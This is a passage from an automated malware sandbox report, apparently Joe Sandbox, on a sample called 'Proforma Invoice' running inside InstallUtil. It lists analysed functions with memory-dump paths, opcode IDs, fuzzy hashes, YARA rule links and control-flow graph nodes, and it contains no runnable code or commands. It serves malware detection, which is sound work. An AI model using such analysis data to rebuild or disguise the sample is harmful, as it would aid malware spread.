                                                                                          • Opcode Fuzzy Hash: bcf515542608614582ae36a57760fe03a9bb66eec784a56968b3a4d1dace3176
                                                                                          • Instruction Fuzzy Hash: E2D01230A0110CEF8B00DFB8E95165D77B5FB45210B1041A99508D7210EA315F049B81
                                                                                          Function 008EF2C8 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 33d3030a2d7933826c8033b41792c3dc00229e821b72d7e7a0597671cfd84062
                                                                                          • Instruction ID: 17a941d5c7d66e9ddf3a5b60e030d5deaeffb86b6da0ef04c349c0145b167a4e
                                                                                          • Opcode Fuzzy Hash: 33d3030a2d7933826c8033b41792c3dc00229e821b72d7e7a0597671cfd84062
                                                                                          • Instruction Fuzzy Hash: 36D0C73354632867D63555A65C01F96771C9B15BA1F054066FB046F78081B17940D7D4
                                                                                          Function 06DC8DE9 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d535cc24979fe8e178b1224fd2769f951da17df4c8502cb7e7e14abc5253b26a
                                                                                          • Instruction ID: fc7045f5768c4909d952667d682805551cb63d30ec7ef9de01beafdbfa23397e
                                                                                          • Opcode Fuzzy Hash: d535cc24979fe8e178b1224fd2769f951da17df4c8502cb7e7e14abc5253b26a
                                                                                          • Instruction Fuzzy Hash: 7CD05E70608209CFD3119B28D49CB6A7AA2FB49308F2444D9A06DCB286CF754A869B56
                                                                                          Function 06DDE758 Relevance: .0, Instructions: 12COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cf4fae0d3f6b8e371bfe3b22a98a62831e1d85585a74ee44709edbdcb57296f
                                                                                          • Instruction ID: 8696f7c60a73a852dc9f2a86f85e09f70474c46cb8f80e439cccc5a85d778d6d
                                                                                          • Opcode Fuzzy Hash: 1cf4fae0d3f6b8e371bfe3b22a98a62831e1d85585a74ee44709edbdcb57296f
                                                                                          • Instruction Fuzzy Hash: 73C08C3184E204ABE2D83344A7083703BACA30220AF001854D40D040638AA08000C294
                                                                                          Function 008ECC80 Relevance: .0, Instructions: 11COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1073535ea71e20b705f0ae94f08213a714bac9e48e287e725dea46e9cb5faeb
                                                                                          • Instruction ID: f116600870d119b9eded4d6979f21c2edb2f0d8799016f540f4fcb9779acc523
                                                                                          • Opcode Fuzzy Hash: c1073535ea71e20b705f0ae94f08213a714bac9e48e287e725dea46e9cb5faeb
                                                                                          • Instruction Fuzzy Hash: B2C08C72014704CBD2A83FA6AA0E3783E6CBB02216F400150F01C811E25F704802C7AA

                                                                                          Non-executed Functions

                                                                                          Function 059B6E5B Relevance: 1.6, Instructions: 1600COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2469463430.00000000059B0000.00000004.08000000.00040000.00000000.sdmp, Offset: 059B0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2469774037.0000000005A00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_59b0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                                          • Instruction ID: 78aa90774dd44d5aeba3b8ea43cde21101b399e5257f464fbcd54d90eff393d9
                                                                                          • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                                          • Instruction Fuzzy Hash: 66C2B16240E3C25FE7138BB49EB66E17FB1EE9321471E0ADBD0C18F163E258554AC762
                                                                                          Function 06DDE2F0 Relevance: .2, Instructions: 219COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80d95453df38fc53435540dca7e75e8f0ea869460ab77d6603c4607651b40354
                                                                                          • Instruction ID: 947c4adec1c2cd1375ffd232dea51d4f23b90241db340392d2869b4442471592
                                                                                          • Opcode Fuzzy Hash: 80d95453df38fc53435540dca7e75e8f0ea869460ab77d6603c4607651b40354
                                                                                          • Instruction Fuzzy Hash: 0B911670D05218CFEBA4EF69C844BEDBBB2BF49301F5494A9C11DAB251DB709985CF80
                                                                                          Function 008E90D1 Relevance: .2, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8a550bee38b1de2f19aa4ab8531bed02984f4fd61bb8ba60a7a773612c0ec4f
                                                                                          • Instruction ID: de70676b3a15c40cd05d357f2e5c7c6059816b0cd013f186b330bf7116f99d40
                                                                                          • Opcode Fuzzy Hash: e8a550bee38b1de2f19aa4ab8531bed02984f4fd61bb8ba60a7a773612c0ec4f
                                                                                          • Instruction Fuzzy Hash: 9C71EBB5E00645CBD748EF7AE850A9EBBF2FBCA300F14C529D0049B269EB74190ADB51
                                                                                          Function 008E90E0 Relevance: .2, Instructions: 165COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e788509da8d51e3a0f2268ae81525f1d0e0d2309ee94e069fbde30dded04d6f9
                                                                                          • Instruction ID: 7d3a9fd8f0d81a680b4a43b6733fa8cfe24df881caec2192abac2f195e4c0d98
                                                                                          • Opcode Fuzzy Hash: e788509da8d51e3a0f2268ae81525f1d0e0d2309ee94e069fbde30dded04d6f9
                                                                                          • Instruction Fuzzy Hash: AA71DCB4E00645CBD748EF6AE850A9EBBF2FBCA300F14C539D0049B279EB755906DB91
                                                                                          Function 06DC0040 Relevance: .1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 95b7a0cdd03b76294f8d89b899da440fe6e600f5186b622f84b1bb9453654c56
                                                                                          • Instruction ID: 42d119d7af9a883fb9c925a6b5bf0439900cf2596ad4907f90de6a9c131e160e
                                                                                          • Opcode Fuzzy Hash: 95b7a0cdd03b76294f8d89b899da440fe6e600f5186b622f84b1bb9453654c56
                                                                                          • Instruction Fuzzy Hash: 9831E771E04629CBEB68CF6BC844B99BAF6BFC8314F00C0EA944DA7254DB704A85CF51
                                                                                          Function 008E96F9 Relevance: .1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2453562127.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_8e0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51c517f78144992d0af2b808679c010b7af9f67f4993532dea256e630e09ae2c
                                                                                          • Instruction ID: 34bdb9fcd477d660c8f99935f03cd9d233c5091b0fe846d272c17caad8aeed7b
                                                                                          • Opcode Fuzzy Hash: 51c517f78144992d0af2b808679c010b7af9f67f4993532dea256e630e09ae2c
                                                                                          • Instruction Fuzzy Hash: F8319BB1D056188BEB18CF6BCD5478AFAF7BFC9304F14C1AAC54CA6264DB750A858F40
                                                                                          Function 06DC003A Relevance: .1, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2481354113.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6dc0000_Proforma Invoice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37f9fedfa1767e91415b61144d83b5407c96debdbd411fe26614951e27375122
                                                                                          • Instruction ID: ffaa9769a468e0a51f5af0cc8d62245d0ed6fa37a53bc7bb5d41df9b69efcf27
                                                                                          • Opcode Fuzzy Hash: 37f9fedfa1767e91415b61144d83b5407c96debdbd411fe26614951e27375122
                                                                                          • Instruction Fuzzy Hash: 6021AAB1D04619CBEB29CF6BCD4439AFAF7AFC8304F04C1FA941CA6255D7700A858E51

                                                                                          Execution Graph

                                                                                          Execution Coverage:13%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:51
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 24526 b70a03 24527 b7091b 24526->24527 24528 b7084e 24526->24528 24528->24527 24530 b71333 24528->24530 24532 b7133b 24530->24532 24531 b71434 24531->24528 24532->24531 24537 b77c55 24532->24537 24541 b77d48 24532->24541 24545 b77d38 24532->24545 24549 b77e60 24532->24549 24538 b77d42 24537->24538 24539 b77e0f 24538->24539 24560 5e6f2e8 24538->24560 24539->24532 24539->24539 24542 b77d5e 24541->24542 24543 b77e0f 24542->24543 24544 5e6f2e8 2 API calls 24542->24544 24543->24532 24544->24543 24546 b77d3c 24545->24546 24547 b77e0f 24546->24547 24548 5e6f2e8 2 API calls 24546->24548 24547->24532 24547->24547 24548->24547 24550 b77e6a 24549->24550 24552 b77eac 24550->24552 24568 5e6d920 24550->24568 24573 5e6d911 24550->24573 24579 5e6d91c 24550->24579 24551 b77edf 24551->24532 24552->24551 24559 5e6f2e8 2 API calls 24552->24559 24553 b77e7d 24557 5e6e8c0 2 API calls 24553->24557 24584 5e6e8b1 24553->24584 24557->24552 24559->24551 24563 5e6f32a 24560->24563 24561 5e6f35f 24563->24561 24564 5e6e8c0 24563->24564 24567 5e6e8da 24564->24567 24565 5e6db70 GlobalMemoryStatusEx GlobalMemoryStatusEx 24565->24567 24566 5e6eb21 24566->24563 24567->24565 24567->24566 24569 5e6d935 24568->24569 24570 5e6db4a 24569->24570 24571 5e6db5f GlobalMemoryStatusEx GlobalMemoryStatusEx 24569->24571 24572 5e6db70 GlobalMemoryStatusEx GlobalMemoryStatusEx 24569->24572 24570->24553 24571->24569 24572->24569 24574 5e6d91c 2 API calls 24573->24574 24575 5e6d917 24574->24575 24576 5e6db4a 24575->24576 24577 5e6db70 GlobalMemoryStatusEx GlobalMemoryStatusEx 24575->24577 24578 5e6db5f GlobalMemoryStatusEx GlobalMemoryStatusEx 24575->24578 24576->24553 24577->24575 24578->24575 24580 5e6d935 24579->24580 24581 5e6db4a 24580->24581 24582 5e6db70 GlobalMemoryStatusEx GlobalMemoryStatusEx 24580->24582 24583 5e6db5f GlobalMemoryStatusEx GlobalMemoryStatusEx 24580->24583 24581->24553 24582->24580 24583->24580 24587 5e6e8bf 24584->24587 24585 5e6db70 GlobalMemoryStatusEx GlobalMemoryStatusEx 24585->24587 24586 5e6eb21 24586->24552 24587->24585 24587->24586

                                                                                          Executed Functions

                                                                                          Function 00B7AA13 Relevance: 2.7, Instructions: 2740COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b77150bf2ecb498e99a341d5d91aab504aef6fbb0a2b005654d1f777b1c26565
                                                                                          • Instruction ID: 6025f8b8b7dc751a7c9714b9794587a9d0103fc4d4c86d9c3a3d819e4bb9b42e
                                                                                          • Opcode Fuzzy Hash: b77150bf2ecb498e99a341d5d91aab504aef6fbb0a2b005654d1f777b1c26565
                                                                                          • Instruction Fuzzy Hash: DD53E531C10B5A8ACB51EF68C8806A9F7B1FF99300F51D79AE45877125EB70AAD4CF81
                                                                                          Function 00B7E205 Relevance: 2.0, Instructions: 1953COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3a292659fb9403f35220d1dd30dd8d6fad415e9d38cbf791667a5b140c8af196
                                                                                          • Instruction ID: 86c4786b25b31e1e2849db9b12dcf06042872fd20a18ce4d26d607fac399aab3
                                                                                          • Opcode Fuzzy Hash: 3a292659fb9403f35220d1dd30dd8d6fad415e9d38cbf791667a5b140c8af196
                                                                                          • Instruction Fuzzy Hash: 5913EB31D10B1A8ACB11EF68C8945ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                          Function 00B74178 Relevance: .3, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 038bf971c1af7dae94b87a59aaeebaaa4fbfdcaab0b8b53204a610923220b936
                                                                                          • Instruction ID: 4457777eee36e769fb7f857b34efb8fbcb630ff78e3968aadfaaeabf00631afa
                                                                                          • Opcode Fuzzy Hash: 038bf971c1af7dae94b87a59aaeebaaa4fbfdcaab0b8b53204a610923220b936
                                                                                          • Instruction Fuzzy Hash: ADB14C70E10219CFDB10CFA9C8857ADBBF2EF88305F14C169E829A7394EB749845CB85
                                                                                          Function 00B74A48 Relevance: .3, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8354344a8c98a1dc4772ea764d333bc98aab891ac484ddede5b4e52c51afb214
                                                                                          • Instruction ID: 3410ff2ecaa870491281806e065148520d1916505c1a09a2638ccc2fed583662
                                                                                          • Opcode Fuzzy Hash: 8354344a8c98a1dc4772ea764d333bc98aab891ac484ddede5b4e52c51afb214
                                                                                          • Instruction Fuzzy Hash: 0BB14C70E002098FDB10CFA9D89579DBBF2EF88715F24C569D829AB394EB749C45CB81
                                                                                          Function 00B73E30 Relevance: .2, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3a92112d78c0e40ba397712982d63db38999cfb0e8e60a8cce9e504fcf6099bc
                                                                                          • Instruction ID: 9c864f7dfcaf08d31e8cab4a4b8481566ed9edb68288bf48768ac7818c1a8ea8
                                                                                          • Opcode Fuzzy Hash: 3a92112d78c0e40ba397712982d63db38999cfb0e8e60a8cce9e504fcf6099bc
                                                                                          • Instruction Fuzzy Hash: 78915D70E00209CFDF14CFA9C8817AEBBF2EF88714F14C169E419AB294DB749985CB91
                                                                                          Function 05E6E72C Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 978 5e6e72c-5e6e73b 979 5e6e765-5e6e784 call 5e6df88 978->979 980 5e6e73d-5e6e764 call 5e6df7c 978->980 986 5e6e786-5e6e789 979->986 987 5e6e78a-5e6e7e9 979->987 994 5e6e7ef-5e6e87c GlobalMemoryStatusEx 987->994 995 5e6e7eb-5e6e7ee 987->995 999 5e6e885-5e6e8ad 994->999 1000 5e6e87e-5e6e884 994->1000 1000->999
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2762644267.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_5e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da9cf4be0d234a53cf34d78e280cc0456293c2efb326061c4cad62f24820b702
                                                                                          • Instruction ID: 89d179eb363bf9471b8c0492921307f7c3ba31fad172055f2896b5a229e7e1f9
                                                                                          • Opcode Fuzzy Hash: da9cf4be0d234a53cf34d78e280cc0456293c2efb326061c4cad62f24820b702
                                                                                          • Instruction Fuzzy Hash: 16415772E043968FDB04CF79D8442AEBFF5AF89210F15856AE448E7381DB749844CBD1
                                                                                          Function 05E6E800 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1003 5e6e800-5e6e846 1005 5e6e84e-5e6e87c GlobalMemoryStatusEx 1003->1005 1006 5e6e885-5e6e8ad 1005->1006 1007 5e6e87e-5e6e884 1005->1007 1007->1006
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 05E6E86F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2762644267.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_5e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: 7dd7582e2ded4276842903dd73848d60eb8cb26a71973033462d3d65c12d12f1
                                                                                          • Instruction ID: b66c58af9ec812df23a459e6c4146d34b6585f8e3b61bfebb8d9c9d1cb854d62
                                                                                          • Opcode Fuzzy Hash: 7dd7582e2ded4276842903dd73848d60eb8cb26a71973033462d3d65c12d12f1
                                                                                          • Instruction Fuzzy Hash: BC1103B1C00659DBDB10CF9AC44579EFBF4AF48260F15816AD918B7240D378A944CFA5
                                                                                          Function 05E6E808 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1010 5e6e808-5e6e846 1011 5e6e84e-5e6e87c GlobalMemoryStatusEx 1010->1011 1012 5e6e885-5e6e8ad 1011->1012 1013 5e6e87e-5e6e884 1011->1013 1013->1012
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 05E6E86F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2762644267.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_5e60000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: 0bdc4cdefdd11185ac630449e96f00e28301ea3fe4fbb26a621e54e5ec4a2730
                                                                                          • Instruction ID: 667d158cea199871c1d02a64f3a524fd8b3350ab09f7064102045b45746e19e5
                                                                                          • Opcode Fuzzy Hash: 0bdc4cdefdd11185ac630449e96f00e28301ea3fe4fbb26a621e54e5ec4a2730
                                                                                          • Instruction Fuzzy Hash: 841112B1C00659DBDB10CF9AC445B9EFBF8BF48320F15816AD918B7240D378A944CFA5
                                                                                          Function 00B78718 Relevance: .6, Instructions: 558COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 2582 b78718-b7871a 2583 b7871e-b78722 2582->2583 2584 b7871c 2582->2584 2585 b78726-b7872f 2583->2585 2586 b78724 2583->2586 2584->2583 2587 b78731-b78734 2585->2587 2586->2585 2588 b78736-b7875c 2587->2588 2589 b78761-b78764 2587->2589 2588->2589 2590 b78766-b7878c 2589->2590 2591 b78791-b78794 2589->2591 2590->2591 2592 b78796-b787bc 2591->2592 2593 b787c1-b787c4 2591->2593 2592->2593 2595 b787c6-b787ec 2593->2595 2596 b787f1-b787f4 2593->2596 2595->2596 2598 b787f6-b7881c 2596->2598 2599 b78821-b78824 2596->2599 2598->2599 2603 b78826-b7884c 2599->2603 2604 b78851-b78854 2599->2604 2603->2604 2606 b78856-b7887c 2604->2606 2607 b78881-b78884 2604->2607 2606->2607 2613 b78886-b788ac 2607->2613 2614 b788b1-b788b4 2607->2614 2613->2614 2616 b788b6-b788dc 2614->2616 2617 b788e1-b788e4 2614->2617 2616->2617 2623 b788e6-b7890c 2617->2623 2624 b78911-b78914 2617->2624 2623->2624 2626 b78916-b7893c 2624->2626 2627 b78941-b78944 2624->2627 2626->2627 2633 b78946-b7896c 2627->2633 2634 b78971-b78974 2627->2634 2633->2634 2636 b78976-b7899c 2634->2636 2637 b789a1-b789a4 2634->2637 2636->2637 2643 b789a6 2637->2643 2644 b789b1-b789b4 2637->2644 2655 b789ac 2643->2655 2646 b789b6-b789dc 2644->2646 2647 b789e1-b789e4 2644->2647 2646->2647 2653 b789e6-b789fc 2647->2653 2654 b78a01-b78a04 2647->2654 2653->2654 2659 b78a06-b78a2c 2654->2659 2660 b78a31-b78a34 2654->2660 2655->2644 2659->2660 2662 b78a36-b78a5c 2660->2662 2663 b78a61-b78a64 2660->2663 2662->2663 2668 b78a66-b78a8c 2663->2668 2669 b78a91-b78a94 2663->2669 2668->2669 2670 b78a96-b78abc 2669->2670 2671 b78ac1-b78ac4 2669->2671 2670->2671 2677 b78ac6-b78aec 2671->2677 2678 b78af1-b78af4 2671->2678 2677->2678 2679 b78af6-b78b1c 2678->2679 2680 b78b21-b78b24 2678->2680 2679->2680 2686 b78b26-b78b4c 2680->2686 2687 b78b51-b78b54 2680->2687 2686->2687 2688 b78b56-b78b7c 2687->2688 2689 b78b81-b78b84 2687->2689 2688->2689 2696 b78b86-b78bac 2689->2696 2697 b78bb1-b78bb4 2689->2697 2696->2697 2698 b78bb6-b78bdc 2697->2698 2699 b78be1-b78be4 2697->2699 2698->2699 2706 b78be6-b78c0c 2699->2706 2707 b78c11-b78c14 2699->2707 2706->2707 2708 b78c16-b78c3c 2707->2708 2709 b78c41-b78c44 2707->2709 2708->2709 2716 b78c46-b78c6c 2709->2716 2717 b78c71-b78c74 2709->2717 2716->2717 2718 b78c76-b78c9c 2717->2718 2719 b78ca1-b78ca4 2717->2719 2718->2719 2726 b78ca6-b78ccc 2719->2726 2727 b78cd1-b78cd4 2719->2727 2726->2727 2728 b78cd6-b78cfc 2727->2728 2729 b78d01-b78d04 2727->2729 2728->2729 2736 b78d06-b78d2c 2729->2736 2737 b78d31-b78d34 2729->2737 2736->2737 2738 b78d36-b78d5c 2737->2738 2739 b78d61-b78d64 2737->2739 2738->2739 2746 b78d66-b78d72 2739->2746 2747 b78d7f-b78d82 2739->2747 2763 b78d7a 2746->2763 2748 b78d84-b78d86 2747->2748 2749 b78d93-b78d96 2747->2749 2800 b78d88 call b7a013 2748->2800 2801 b78d88 call b79f70 2748->2801 2802 b78d88 call b79f60 2748->2802 2756 b78dc3-b78dc6 2749->2756 2757 b78d98-b78dbe 2749->2757 2758 b78df3-b78df6 2756->2758 2759 b78dc8-b78dee 2756->2759 2757->2756 2765 b78e23-b78e26 2758->2765 2766 b78df8-b78e1e 2758->2766 2759->2758 2760 b78d8e 2760->2749 2763->2747 2768 b78e53-b78e56 2765->2768 2769 b78e28-b78e4e 2765->2769 2766->2765 2772 b78e83-b78e86 2768->2772 2773 b78e58-b78e7e 2768->2773 2769->2768 2776 b78eb3-b78eb6 2772->2776 2777 b78e88-b78eae 2772->2777 2773->2772 2780 b78ee3-b78ee5 2776->2780 2781 b78eb8-b78ede 2776->2781 2777->2776 2785 b78ee7 2780->2785 2786 b78eec-b78eef 2780->2786 2781->2780 2785->2786 2786->2587 2790 b78ef5-b78efb 2786->2790 2800->2760 2801->2760 2802->2760
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2753774248.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_b70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9bda644632aa9dcca61c7e155ba0cb8b9f248454e405b357e2475ed44031281d
                                                                                          • Instruction ID: b290c94161d64f5ad6fd50dfca205e101c8ad2efea16ccd82b535cf7f9aa0a52
                                                                                          • Opcode Fuzzy Hash: 9bda644632aa9dcca61c7e155ba0cb8b9f248454e405b357e2475ed44031281d
                                                                                          • Instruction Fuzzy Hash: 4C128F347002029BDB16AB38E49936D73E3EBCA355B209D78E855CB395DF31DD468781
                                                                                          Function 00B7A1DA Relevance: .4, Instructions: 395COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
